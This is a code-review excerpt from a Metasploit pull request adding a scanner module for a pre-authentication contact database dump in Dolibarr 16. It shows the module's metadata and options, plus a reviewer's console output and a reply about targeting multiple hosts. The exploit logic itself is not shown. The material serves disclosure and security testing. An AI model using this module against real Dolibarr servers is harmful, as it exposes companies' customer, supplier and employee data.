modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb

```diff
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Module::Failure
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dolibarr 16 pre-auth contact database dump',
+        'Description' => %q{
+          Dolibarr version 16 < 16.0.5 is vulnerable to a pre-authentication contact database dump.
+          An unauthenticated attacker may retreive a company’s entire customer file, prospects, suppliers,
+          and potentially employee information if a contact file exists.
+          Both public and private notes are also included in the dump.
+        },
+        'Author' => [
+          'Vladimir TOUTAIN', 'Nolan LOSSIGNOL-DRILLIEN'
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2023-03-14',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'References' => [
+          ['URL', 'https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7'],
+          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e']
+        ],
+        'DefaultOptions' => {
+          'HttpClientTimeout' => 20
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Path to Dolibarr instance', '/'])
```

Comment:
I think there will be an issue if the user decide to run it against multiple targets with different URI's. My test environment has two targets and one has Dolibarr  at `http://x.x.x.x/` and the other one at `http://x.x.x.x/dolibarr`.
```
msf6 auxiliary(scanner/http/dolibarr_16_contact_dump) > set rhosts 127.0.0.1 192.168.100.3
rhosts => 127.0.0.1 192.168.100.3
msf6 auxiliary(scanner/http/dolibarr_16_contact_dump) > check
[*] 127.0.0.1:80 - The target appears to be vulnerable. Detected vulnerable Dolibarr version: 16.0.4
[*] Checked 1 of 2 hosts (050% complete)
[*] 192.168.100.3:80 - The service is running, but could not be validated. Dolibarr version not found - proceeding anyway...
[*] Checked 2 of 2 hosts (100% complete)

Reply:
Yes the TARGETURI often works on single target only in scanner modules. However I tried with a host file like `set rhosts file:///home/yourhosts.txt` with the following example content and it works (it overrides the TARGETURI option) :
```text
https://mydolibar1/
https://mydolibar2/randomURI/
http://mydolibar1:88/
```